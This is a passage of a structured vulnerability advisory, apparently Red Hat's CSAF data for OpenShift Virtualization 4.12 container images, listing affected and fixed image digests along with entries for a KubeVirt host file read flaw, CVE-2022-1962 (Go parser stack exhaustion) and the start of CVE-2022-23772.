"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, { cve: "CVE-2022-1962", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107376", }, ], notes: [ { category: "description", text: "A flaw was found in the golang standard library, go/parser. When calling any Parse functions on the Go source code, which contains deeply nested types or declarations, a panic can occur due to stack exhaustion. This issue allows an attacker to impact system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: go/parser: stack exhaustion in all Parse* functions", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1962", }, { category: "external", summary: "RHBZ#2107376", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1962", url: "https://www.cve.org/CVERecord?id=CVE-2022-1962", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1962", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1962", }, { category: "external", summary: "https://go.dev/issue/53616", url: "https://go.dev/issue/53616", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 5.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: go/parser: stack exhaustion in all Parse* functions", }, { cve: "CVE-2022-23772", cwe: { id: "CWE-190", name: "Integer Overflow or Wraparound", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", 